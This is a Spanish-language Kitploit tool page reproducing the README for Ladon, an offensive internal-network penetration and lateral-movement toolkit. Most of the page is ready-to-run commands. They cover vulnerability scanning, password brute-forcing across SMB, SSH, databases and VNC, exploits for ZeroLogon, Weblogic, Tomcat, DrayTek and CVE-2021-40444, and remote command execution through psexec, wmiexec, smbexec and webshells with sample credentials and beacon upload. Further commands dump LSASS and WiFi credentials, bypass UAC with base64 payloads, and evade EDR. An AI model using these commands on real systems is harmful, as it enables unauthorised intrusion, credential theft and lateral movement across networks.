Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Ladon — Ladon escáner de penetración de redes internas a gran escala, complemento de PowerShell, Cobalt Strike, carga en memoria, escaneo sin archivos. Incluye escaneo de puertos, identificación de servicios, detección de activos de red, auditoría de contraseñas, detección de vulnerabilidades de alto riesgo, explotación de vulnerabilidades, lectura de contraseñas y un solo clic para GetShell, admite escaneo por lotes de segmentos A/B/C y escaneo a través de redes, admite escaneo de listas de URL, hosts, dominios, etc. Detección de activos de red mediante 32 protocolos (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) o métodos para obtener rápidamente IP de hosts activos, nombre de computadora, grupo de trabajo, recursos compartidos, dirección de tarjeta de red, versión del sistema operativo, sitio web, subdominio, middleware, servicios abiertos, enrutadores, conmutadores, bases de datos, impresoras, etc., gran cantidad de módulos de detección de vulnerabilidades de alto riesgo MS17010, Zimbra, Exchange | Kitploit
Herramientas/GitHubGitHub/k8gege/ladon
Escalada de PrivilegiosReconocimientoEscáneres de VulnerabilidadesMapeo de RedesAtaques de ContraseñasEscaneo de PuertosExplotaciónMovimiento LateralRecopilación de Información

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Ladon escáner de penetración de redes internas a gran escala, complemento de PowerShell, Cobalt Strike, carga en memoria, escaneo sin archivos. Incluye escaneo de puertos, identificación de servicios, detección de activos de red, auditoría de contraseñas, detección de vulnerabilidades de alto riesgo, explotación de vulnerabilidades, lectura de contraseñas y un solo clic para GetShell, admite escaneo por lotes de segmentos A/B/C y escaneo a través de redes, admite escaneo de listas de URL, hosts, dominios, etc. Detección de activos de red mediante 32 protocolos (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) o métodos para obtener rápidamente IP de hosts activos, nombre de computadora, grupo de trabajo, recursos compartidos, dirección de tarjeta de red, versión del sistema operativo, sitio web, subdominio, middleware, servicios abiertos, enrutadores, conmutadores, bases de datos, impresoras, etc., gran cantidad de módulos de detección de vulnerabilidades de alto riesgo MS17010, Zimbra, Exchange

Compartir
Seguridad Web
Pruebas de Penetración
Enumeración de Subdominios
GitHubk8gege/ladon

Ladon

Ver RepositorioSitio web
5.3k882hace 1 añoRevisado por Kitploit

Ladon Escáner de penetración de redes internas grandes Carga de memoria del complemento Cobalt Strike

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

image

Introducción del programa

Ladon es una herramienta de escaneo de penetración de redes internas grandes, penetración de dominio, herramienta lateral. Módulo PowerShell, complemento Cobalt Strike, carga en memoria, escaneo sin archivos. Incluye escaneo de puertos, identificación de servicios, detección de activos de red, auditoría de contraseñas, detección de vulnerabilidades de alto riesgo, explotación de vulnerabilidades, lectura de contraseñas y GetShell con un clic. Soporta escaneo por lotes de segmentos A/B/C y escaneo entre redes. Soporta escaneo de listas de URL, hosts, dominios, etc. La versión 12.2 tiene 262 módulos de funciones integrados. El módulo de detección de activos de red cuenta con más de 30 protocolos (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) y métodos para obtener rápidamente información de hosts activos en la red objetivo: IP, nombre de computadora, grupo de trabajo, recursos compartidos, dirección de tarjeta de red, versión del sistema operativo, sitio web, subdominio, middleware, servicios abiertos, enrutadores, conmutadores, bases de datos, impresoras, etc. Detección de vulnerabilidades de alto riesgo 16+ incluye Cisco, Zimbra, Exchange, DrayTek, MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, serie Struts2, Printer, etc. Auditoría de contraseñas 25+ incluye bases de datos (Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar, etc. Ejecución remota de comandos incluye (smbexec/wmiexe/psexec/atexec/sshexec/webshell). El módulo de identificación de huellas digitales web puede identificar 135+ (aplicaciones web, middleware, tipos de script, tipos de página), etc. Escalada local de privilegios 21+ incluye SweetPotato\BadPotato\EfsPotato\BypassUAC. Soporta complementos POC altamente personalizables: .NET assemblies, DLL (C#/Delphi/VC), PowerShell, etc. Soporta llamar a cualquier programa externo o comando por lotes a través de configuración INI. El generador EXP puede generar POC/EXP de vulnerabilidad con un clic para expandir rápidamente la capacidad de escaneo. Ladon soporta carga en memoria de complementos Cobalt Strike, escaneo sin archivos en redes internas para movimiento lateral rápido.

Descarga de Ladon```Bash

https://github.com/k8gege/Ladon/releases https://k8gege.org/Download

root@kitploit:~
### Uso sencillo

Aunque Ladon tiene muchas y variadas funciones, su uso es muy sencillo, cualquiera puede dominarlo fácilmente.<br>
Solo se necesita uno o dos parámetros para usar el 90% de las funciones; un módulo equivale a una nueva herramienta.

### Entorno de ejecución

#### Windows

Ladon se puede usar en sistemas Windows con .NET 2.0 o superior (Windows 7 y posteriores incluyen .NET de serie).<br>
Como Cmd, PowerShell, Cmd de control remoto, WebShell, etc., así como la carga en memoria de Cobalt Strike.<br>
Ladon.ps1 es totalmente compatible con PowerShell de Win7 a Win11/2025, sin importar la versión, permite carga remota sin archivos para penetración.

#### LadonGo multiplataforma compatible con Linux, Mac, Arm, MIPS
Plataformas: Linux, MacOS, Windows, routers, dispositivos de red, etc.<br>
https://github.com/k8gege/LadonGo

### Condiciones difíciles

En la práctica no todo va bien; a veces, después de reenviar en la intranet, va muy lento o no se puede reenviar, solo se puede subir la herramienta al objetivo.<br>
Algunos caballos pueden tardar medio día en subir un programa de 2-3 MB, o incluso no pueden subirlo; los de Python de decenas de MB ni pensarlo.<br>
Ladon está desarrollado en C#, el tamaño del programa es muy pequeño, alrededor de 500 KB; incluso si el caballo no funciona, se puede subir un programa de 500 KB, ¿verdad?<br>
Si eso tampoco funciona, se puede cargar remotamente en memoria con PowerShell, algo que los programas grandes compilados en Python o Go no pueden igualar.

### Propósito

Un servicio integral, proporcionando a los usuarios una herramienta de escaneo simple, fácil de usar, rica en funciones y altamente flexible.

### Características

Bajo tráfico de escaneo<br>
Tamaño de programa pequeño<br>
Funciones ricas y potentes<br>
Programa simple y fácil de usar<br>
Plugins compatibles con múltiples lenguajes<br>
Multiplataforma (Win/Kali/Ubuntu), etc.<br>
Compatible con complementos de Cobalt Strike<br>
Soporte para penetración sin archivos con PowerShell<br>
Generador de Exp puede generar PoC con un clic<br>
Múltiples versiones adecuadas para diversos entornos<br>

### Función de parámetros del programa

1  Soporta escaneo de IP especificada<br>
2  Soporta escaneo de dominio especificado<br>
3  Soporta escaneo de nombre de máquina especificado<br>
4  Soporta escaneo de segmento C especificado (ip/24)<br>
5  Soporta escaneo de segmento B especificado (ip/16)<br>
6  Soporta escaneo de segmento A especificado (ip/8)<br>
7  Soporta escaneo de URL especificada<br>
8  Soporta escaneo de IP masivo (ip.txt)<br>
9  Soporta escaneo de segmento C masivo (ip24.txt)<br>
10 Soporta escaneo de segmento C masivo (ipc.txt)<br>
11 Soporta escaneo de segmento B masivo (ip16.txt)<br>
12 Soporta escaneo de URL masivo (url.txt)<br>
13 Soporta escaneo de dominios masivo (domain.txt)<br>
14 Soporta escaneo de nombres de máquina masivo (host.txt)<br>
15 Soporta escaneo de segmentos CIDR de países masivo (cidr.txt)<br>
16 Soporta lista de cadenas masiva (str.txt)<br>
17 Soporta lista de cuentas y contraseñas de host (check.txt)<br>
18 Soporta lista de usuarios y contraseñas (userpass.txt)<br>
19 Soporta escaneo de segmento C en rango especificado<br>
20 Soporta carga de DLL personalizada mediante parámetros (solo C#)<br>
21 Soporta carga de EXE personalizado mediante parámetros (solo C#)<br>
22 Soporta carga de archivo de configuración INI personalizado mediante parámetros<br>
23 Soporta carga de PowerShell personalizado mediante parámetros<br>
24 Soporta programas personalizados (comandos del sistema o programas de terceros, es decir, programas o scripts desarrollados en cualquier lenguaje)<br>
25 Plugins (soporta múltiples lenguajes: C#/Delphi/Golang/Python/VC/PowerShell)<br>
26 Soporta Cobalt Strike (escaneo de la intranet objetivo bajo la línea de comandos de beacon o escaneo de objetivos externos mediante salto)<br>
27 Soporta escaneo de IP en formato CIDR, como 100.64.0.0/10, 192.168.1.1/20, etc.<br>
28 La configuración INI soporta fuerza bruta de contraseñas para programas personalizados<br>

### Tutorial de uso conciso

Ladon Tutorial de uso conciso Documento completo: http://k8gege.org/Ladon <br>
Documento de funciones del módulo Excel: http://k8gege.org/Ladon/wiki.xlsx <br>
Soporta carga en memoria de Cmd, Cobalt Strike, PowerShell, etc.<br>
Versión Windows: .Net, Cobalt Strike, PowerShell<br>
Versiones para todos los sistemas: GO (multiplataforma), Python (teóricamente multiplataforma)<br>
Nota: Study es conveniente para el aprendizaje local; para funciones completas, use CMD.

### Escaneo BypassEDR

La velocidad de escaneo predeterminada es muy rápida, pero algunos WAF o EDR tienen defensas muy fuertes.<br>
Incluso configurando varios hilos, es posible que después de unos 20 minutos ya no se pueda escanear.<br>
bypassEDR simula acceso humano, evitando estrategias de detección de velocidad.<br>
La velocidad de escaneo es más lenta; los novatos que buscan velocidad no deberían usarlo.<br>```Bash
Ladon 10.1.2.8/24 MS17010 bypassEDR

Los módulos relacionados con el descifrado de contraseñas aún no admiten el parámetro bypassEDR

001 Escaneo de hilos personalizado

Ejemplo: escanear el segmento 10.1.2 para detectar la vulnerabilidad MS17010
Hilo único:```Bash Ladon 10.1.2.8/24 MS17010 t=1

root@kitploit:~
80 hilos:```Bash
Ladon noping 10.1.2.8/24 MS17010 t=80

Bajo protección de alta intensidad, configure los hilos de escaneo más bajos, F de un solo hilo
```Bash Ladon 10.1.2.8/24 MS17010 f=1

root@kitploit:~
### 002 Escaneo de proxy Socks5
Ejemplo:Usar 8 hilos para escanear el segmento objetivo 10.1.2 en busca de la vulnerabilidad MS17010<br>```Bash
Ladon noping 10.1.2.8/24 MS17010 t=8

详见:http://k8gege.org/Ladon/proxy.html

PS:Las herramientas proxy no soportan Socks5, por lo que se debe agregar el parámetro noping para escanear
Ya sea Frp u otras herramientas similares, principalmente porque herramientas como Proxifier no soportan el protocolo ICMP
Porque Ladon por defecto primero detecta la actividad mediante ICMP, y luego usa el módulo correspondiente para probar
Por lo tanto, en un entorno de proxy, se debe desactivar el escaneo ping, ya que el ping del sistema utiliza el protocolo ICMP

003 Escaneo de segmentos de red/Escaneo por lotes

Formato CIDR: no solo /24/16/8 (todos)```Bash Ladon 192.168.1.8/24 扫描模块 Ladon 192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块

root@kitploit:~
Formato de letras: solo segmentos C, B, A ordenados secuencialmente```Bash
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块

0x004 Especificar rango IP, escaneo de subred

ICMP detección de hosts vivos del segmento 50-200```Bash

Ladon 192.168.1.50-192.168.1.200 ICMP

root@kitploit:~
#### Detección ICMP de hosts vivos entre 1.30 y 50.80```Bash
Ladon 192.168.1.30-192.168.50.80 ICMP  

Formato TXT

004 ICMP escaneo por lotes de lista de hosts activos en C段```Bash

Ladon ip24.txt ICMP Ladon ipc.txt ICMP

root@kitploit:~
##### 005 ICMP escaneo masivo de hosts vivos en lista de segmento B```Bash
Ladon ip16.txt ICMP
006 Escaneo por lotes ICMP de lista CIDR (por ejemplo, rango IP de un país)```Bash

Ladon cidr.txt ICMP

root@kitploit:~
##### 007 Escaneo por lotes ICMP para verificar si los dominios están activos```Bash
Ladon domain.txt ICMP
008 Escaneo masivo ICMP para verificar si las máquinas están vivas usando nombre de host o nombre de máquina```Bash

Ladon host.txt ICMP

root@kitploit:~
##### 009 WhatCMS identificación masiva de CMS, Banner, certificados SSL, títulos, puede identificar CMS desconocidos, enrutadores, impresoras, dispositivos de red, cámaras, etc.```Bash
Ladon 192.168.1.8 WhatCMS   扫描IP
Ladon 192.168.1.8/24 WhatCMS   扫描C段
Ladon 192.168.1.8/C WhatCMS   扫描C段
Ladon 192.168.1.8/B WhatCMS   扫描B段
Ladon 192.168.1.8/A WhatCMS   扫描A段
Ladon IP.TXT WhatCMS   扫描IP列表
Ladon IP24.TXT WhatCMS   扫描C段列表
Ladon IP16.TXT WhatCMS   扫描B段列表
Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS   扫描IP
Ladon noping 192.168.1.8/24 WhatCMS   扫描C段
010 Detección masiva de versiones, vulnerabilidades y contraseñas débiles en routers DrayTek```Bash

Ladon url.txt DraytekPoc

root@kitploit:~
##### 011 Descifrado por lotes de contraseñas Base64```Bash
Ladon str.txt DeBase64

Escaneo de activos, reconocimiento de huellas digitales, identificación de servicios, hosts vivos, escaneo de puertos

image

012 ICMP escanea hosts vivos (el más rápido)```Bash

Ladon 192.168.1.8/24 ICMP

root@kitploit:~
##### 013 Detección de hosts activos mediante Ping (Invoca el comando Ping del sistema y muestra información como ms, ttl, etc.)```Bash
Ladon 192.168.1.8/24 Ping
014 Detección de hosts activos multiprotocolo (IP, nombre de máquina, MAC/dominio, fabricante/versión del sistema)

Si crees que solo si el comando ping responde está vivo, puedes usar este comando para procesar en lote```Bash Ladon 192.168.1.8/24 OnlinePC

root@kitploit:~
##### 015 Identificación de sistema operativo multiprotocolo (IP、nombre de máquina、versión del SO、servicios abiertos)```Bash
Ladon 192.168.1.8/24 OsInfo
016 Detección de OXID en host con múltiples tarjetas de red```Bash

Ladon 192.168.1.8/24 EthInfo Ladon 192.168.1.8/24 OxidInfo

root@kitploit:~
##### 017 Detección DNS de host con múltiples tarjetas de red```Bash
Ladon 192.168.1.8/24 DnsInfo
018 Escaneo multiprotocolo de IPs de hosts activos```Bash

Ladon 192.168.1.8/24 OnlineIP

root@kitploit:~
##### 019 Escaneo de vulnerabilidad SMB MS17010 (IP, nombre de máquina, ID de vulnerabilidad, versión del sistema operativo)```Bash
Ladon 192.168.1.8/24 MS17010
020 Detección de vulnerabilidad SMBGhost CVE-2020-0796 (IP, nombre de máquina, ID de vulnerabilidad, versión del sistema operativo)```Bash

Ladon 192.168.1.8/24 SMBGhost

root@kitploit:~
##### 021 Escanear título web Banner Para información más completa, use el módulo WhatCMS para detectar```Bash
Ladon 192.168.1.8/24 WebInfo
Ladon http://192.168.1.8 WebInfo
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
022 Escanear dominios URL de sitios del segmento C```Bash

Ladon 192.168.1.8/24 UrlScan

root@kitploit:~
##### 023 Escanear URLs de dominios del segmento C```Bash
Ladon 192.168.1.8/24 SameWeb
024 Escaneo de subdominios y dominios de segundo nivel```Bash

Ladon baidu.com SubDomain

root@kitploit:~
##### 025 IP de resolución de dominio, IP de resolución de nombre de host```Bash
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
025 Resolución por lotes de IP de dominios, resolución por lotes de IP de nombres de host```Bash

Ladon domain.txt DomainIP Ladon host.txt HostIP

root@kitploit:~
##### 025 Resolución por lotes de nombres de dominio y nombres de host: resultado solo IP```Bash
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
026 Consulta DNS de máquinas en el dominio, IP (condición dentro del dominio, especificar IP del controlador de dominio)```Bash

Ladon AdiDnsDump 192.168.1.8

root@kitploit:~
##### 027 Consultar máquinas y IPs en el dominio (dentro del dominio)
Ladon GetDomainIP

##### 028 Escanear puertos de segmento C, escaneo de puertos especificados```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
029 Escaneo de WEB en segmento C e identificación de CMS (800+ identificación de huellas digitales web)```Bash

Ladon 192.168.1.8/24 CMS Ladon 192.168.1.8/24 CmsInfo Ladon 192.168.1.8/24 WhatCMS

root@kitploit:~
030 Escanear dispositivos Cisco```Bash
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
031 Enumerar hosts de base de datos Mssql (IP de la base de datos, nombre de la máquina, versión de SQL)```Bash

Ladon EnumMssql

root@kitploit:~
##### 032 Enumerar recursos compartidos de red 	(dominio, IP, nombre de host\ruta compartida)```Bash
Ladon EnumShare
033 Escanear servidor LDAP (detectar controlador de dominio)```Bash

Ladon 192.168.1.8/24 LdapInfo

root@kitploit:~
##### 034 Escanear servidores FTP e identificar versiones```Bash
Ladon 192.168.1.8/24 FtpInfo

Fuerza bruta / Autenticación de red / Contraseñas débiles / Descifrado de contraseñas / Base de datos / Panel de administración del sitio web / Página de inicio de sesión / Inicio de sesión del sistema

image Consulte el detalle del descifrado de contraseñas en SSH: http://k8gege.org/Ladon/sshscan.html

Puerto 035 445 Descifrado de contraseñas SMB (Windows)```Bash

Ladon 192.168.1.8/24 SmbScan

root@kitploit:~
##### 036 Puerto 135 Wmi descifrado de contraseñas (Windows)```Bash
Ladon 192.168.1.8/24 WmiScan
037 Puerto 389, servidor LDAP, ataque de fuerza bruta de contraseñas de dominio AD (Windows)```Bash

Ladon 192.168.1.8/24 LdapScan

root@kitploit:~
##### 038 Puerto 5985 Fuerza bruta de contraseña Winrm (Windowns)```Bash
Ladon 192.168.1.8/24 WinrmScan
039 Puerto 445 SMB NTLM HASH Fuerza Bruta (Windows)```Bash

Ladon 192.168.1.8/24 SmbHashScan

root@kitploit:~
##### 040 Puerto 135 Wmi NTLM HASH Brute Force (Windows)```Bash
Ladon 192.168.1.8/24 WmiHashScan
041 Puerto 22 Ataque de fuerza bruta de contraseñas SSH (Linux)```Bash

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

root@kitploit:~
##### 042 puerto 1433 fuerza bruta de contraseñas de base de datos Mssql```Bash
Ladon 192.168.1.8/24 MssqlScan
043 Puerto 1521 Fuerza bruta de contraseñas de base de datos Oracle```Bash

Ladon 192.168.1.8/24 OracleScan

root@kitploit:~
Oracle数据库比较特殊,只爆ORCL库会错过很多权限<br>
详见:http://k8gege.org/Ladon/OracleScan.html<br>


##### 044 3306端口 Mysql数据库密码爆破```Bash
Ladon 192.168.1.8/24 MysqlScan
045 Puerto 7001 Weblogic fuerza bruta de contraseña de administración```Bash

Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

root@kitploit:~
##### 046 Puerto 5900 Ataque de fuerza bruta a contraseña de VNC de escritorio remoto```Bash
Ladon 192.168.1.8/24 VncScan
047 Fuerza bruta de contraseñas en servidor FTP puerto 21```Bash

Ladon 192.168.1.8/24 FtpScan

root@kitploit:~
##### 048 Fuerza bruta de contraseña de inicio de sesión de administración de Tomcat en el puerto 8080```Bash
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
049 Fuerza bruta de contraseñas de autenticación básica en el puerto web 401```Bash

Ladon http://192.168.1.8/login HttpBasicScan Ladon ip.txt 401Scan

root@kitploit:~
##### 052 Fuerza bruta de contraseñas de Windows en puerto 139 mediante protocolo Netbios```Bash
Ladon 192.168.1.8/24 NbtScan
053 Puerto 5985 protocolo Winrm Ataque de fuerza bruta de contraseñas de Windows```Bash

Ladon 192.168.1.8/24 WinrmScan

root@kitploit:~
##### 054 Fuerza bruta de contraseñas de cámaras web (contraseñas predeterminadas incorporadas)```Bash
Ladon 192.168.1.8/24 DvrScan

Detección de vulnerabilidades/PoC

image

055 Detección de vulnerabilidades SMB (CVE-2017-0143/CVE-2017-0144)```Bash

Ladon 192.168.1.8/24 MS17010

root@kitploit:~
##### 056 Detección de vulnerabilidad SMBGhost CVE-2020-0796		911 reservado```Bash
Ladon 192.168.1.8/24 SMBGhost
057 Detección de vulnerabilidades de Weblogic (CVE-2019-2725/CVE-2018-2894)```Bash

Ladon 192.168.1.8/24 WeblogicPoc

root@kitploit:~
##### 058 Detección de puerta trasera de PhpStudy (phpstudy 2016/phpstudy 2018)  10.9 eliminado, 911 retenido```Bash
Ladon 192.168.1.8/24 PhpStudyPoc
059 Detección de vulnerabilidad ActiveMQ (CVE-2016-3088)```Bash

Ladon 192.168.1.8/24 ActivemqPoc

root@kitploit:~
##### 060 Detección de vulnerabilidades de Tomcat (CVE-2017-12615)```Bash
Ladon 192.168.1.8/24 TomcatPoc
061 Detección de vulnerabilidades de Struts2 (S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode/S2-045/S2-037)```Bash

Ladon 192.168.1.8/24 Struts2Poc

root@kitploit:~
##### Detección de vulnerabilidad CVE-2020-8515 de DraytekPoc, detección de versión de Draytek, detección de contraseña débil```Bash
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
Detección de vulnerabilidad RCE no autorizada en FortiGate CVE-2024-55591```Bash

Ladon 192.168.1.8/24 CVE-2024-55591

root@kitploit:~
### Explotación de vulnerabilidades / Exploit
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 063 Explotación de Weblogic (CVE-2019-2725)```Bash
Ladon 192.168.1.8/24 WeblogicExp
064 Explotación de vulnerabilidad de Tomcat(CVE-2017-12615)```Bash

Ladon 192.168.1.8/24 TomcatExp

root@kitploit:~
##### 065 Vulnerabilidad 0day de Windows generador universal de inyección DLL para ejecutar CMD (DLL solo 5KB)```Bash
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
066 CVE-2021-40444 Microsoft IE/Office vulnerabilidad 0day```Bash

Ladon CVE-2021-40444 MakeCab poc.dll Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

root@kitploit:~
##### 067 DraytekExp CVE-2020-8515 Exploit de ejecución remota de comandos```Bash
Ladon DraytekExp http://192.168.1.8  whoami
068 Penetración de dominio ZeroLogon CVE-2020-1472 Escalada de privilegios en controlador de dominio (contraseña vacía)```Bash

Ladon ZeroLogon dc.k8gege.org

root@kitploit:~
##### 069 CVE-2020-0688 Vulnerabilidad de serialización de Exchange (.net 4.0)```Bash
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 ForExec exploit de bucle (Win10 EternalDarkness CVE-2020-0796, salida exitosa para evitar pantalla azul del objetivo)```Bash

Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

root@kitploit:~
### Descarga de archivos, transferencia de archivos

##### 071 Transferencia de archivos en la intranet Descarga HTTP Descarga HTTPS Descarga MSF```Bash
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
072 Transferencia de archivos en intranet Ftpdescarga```Bash

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

root@kitploit:~
### Cifrado y descifrado (HEX/Base64)

##### 073 Cifrado y descifrado Hex```Bash
Ladon 123456 EnHex
Ladon 313233343536 DeHex
074 Base64 cifrado y descifrado```Bash

Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 Ladon str.txt DeBase64

root@kitploit:~
### Sniffing de red

##### 075 Sniffing de contraseñas FTP (enlazar IP local, sniffing automático de segmento C)
Máquina con múltiples NIC, sniffing de IP del segmento C correspondiente```Bash
Ladon FtpSniffer 192.168.1.5
076 Sniffer de contraseñas HTTP (vinculado a la IP local, sniffer automático del segmento C)

Máquina con múltiples tarjetas de red, sniffer de la IP del segmento C correspondiente```Bash Ladon HTTPSniffer 192.168.1.5

root@kitploit:~
##### 077 Sniffing de red```Bash
Ladon Sniffer

Lectura de contraseñas

078 Leer contraseñas de sitios IIS y rutas de sitios web```Bash

Ladon IISpwd

root@kitploit:~
##### 079 Leer contraseñas de WiFi conectadas```Bash
Ladon WifiPwd
080 Recuperar contraseña FTP de FileZilla```Bash

Ladon FileZillaPwd

root@kitploit:~
##### 081 Leer hash del sistema, contraseñas VPN, DPAPI-Key  10.9 eliminado```Bash
Ladon CVE-2021-36934  
082 DumpLsass contraseña de memoria (mimikatz texto plano) limitado a versiones anteriores a 9.1.1```Bash

Ladon DumpLsass

root@kitploit:~
### Recopilación de información

![image](http://k8gege.org/k8img/Ladon/Study/Linfo.PNG)

##### 083 API ver usuario actual```Bash
Ladon w
Ladon whoami
083 Obtener IP de red interna local y IP de red externa```Bash

Ladon GetIP Ladon IPinfo

root@kitploit:~
##### 084 Obtener PCname GUID CPUID DiskID dirección MAC```Bash
Ladon GetID
085 Ver archivos recientes del usuario```Bash

Ladon Recent

root@kitploit:~
##### 086 Visualización de registros de uso de USB (nombre USB, etiqueta USB, información de ruta)```Bash
Ladon UsbLog
087 Detectar puerta trasera (elementos de inicio del registro, secuestro de DLL)```Bash

Ladon CheckDoor Ladon AutoRun

root@kitploit:~
##### 088 Detalles del proceso (ruta del programa, bits, parámetros de inicio, usuario)```Bash
Ladon EnumProcess
Ladon Tasklist
089 Obtener argumentos de línea de comandos```Bash

Ladon cmdline Ladon cmdline cmd.exe

root@kitploit:~
##### 090 Obtener información básica de penetración```Bash
Ladon GetInfo
Ladon GetInfo2
091 .NET & PowerShell Versión```Bash

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

root@kitploit:~
##### 092 Versión de ejecución & entorno de compilación```Bash
Ladon Ver
Ladon Version
093 Lista de versiones de tiempo de ejecución & entorno de compilación & software instalado```Bash

Ladon AllVer Ladon AllVersion

root@kitploit:~
##### 094 Ver información del proxy de IE```Bash
Ladon QueryProxy
095 DirList Listar directorios + información básica de penetración
Por defecto lista todo el disco
```Bash

Ladon DirList

root@kitploit:~
###### Especificar letra de unidad o directorio```Bash
Ladon DirList c:\   
096 QueryAdmin ver usuarios administradores```Bash

Ladon QueryAdmin

root@kitploit:~
##### 097 Ver tuberías con nombre del equipo local```Bash
Ladon GetPipe
098 RdpLog ver registros de conexión 3389```Bash

Ladon RdpLog

root@kitploit:~
### Ejecución Remota (psexec/wmiexec/atexec/sshexec/smbexec)

![image](http://k8gege.org/k8img/Ladon/Study/Rexec.PNG)

##### Puertos 099 y 445 - Comando de ejecución remota PSEXEC cifrado (interactivo)```Bash
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
Puerto 100 135 WmiExec ejecución remota de comandos (No interactivo)```Bash

Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 101 Puerto 445 AtExec ejecución remota de comandos (no interactivo)```Bash
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
102 Puerto 22 SshExec Ejecución remota de comandos (no interactivo)```Bash

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

root@kitploit:~
##### 103 Comando de ejecución remota JspShell (no interactivo) Eliminado en 9.3.0
Uso: Ladon JspShell type url pwd cmd```Bash
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
104 WebShell ejecución remota de comandos (no interactivo) eliminado en 9.3.0```Bash

Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami 获取系统版本信息 方便提权 Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo

root@kitploit:~
##### Puertos 105 135 WmiExec2 ejecución remota de comandos compatible con HASH (非交互式)soporte para carga de archivos```Bash
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami		 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe  先Mimikatz注入Hash,再pth执行命令
106 puerto 445 SmbExec Ntlm-Hash ejecución remota de comandos no interactiva (sin eco)```Bash

Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 107 WinrmExec ejecución remota de comandos sin eco (admite privilegios de System)```Bash
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

Escalación y desescalación de privilegios

image

108 whoami ver los permisos y privilegios del usuario actual```Bash

Ladon whoami

root@kitploit:~
##### 109  6 tipos de BypassUAC de lista blanca (después de 8.0) Win7-Win10  Eliminado en la versión 10.8 Solo se conserva 911  
Uso: Ladon BypassUAC Method Base64Cmd```Bash
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
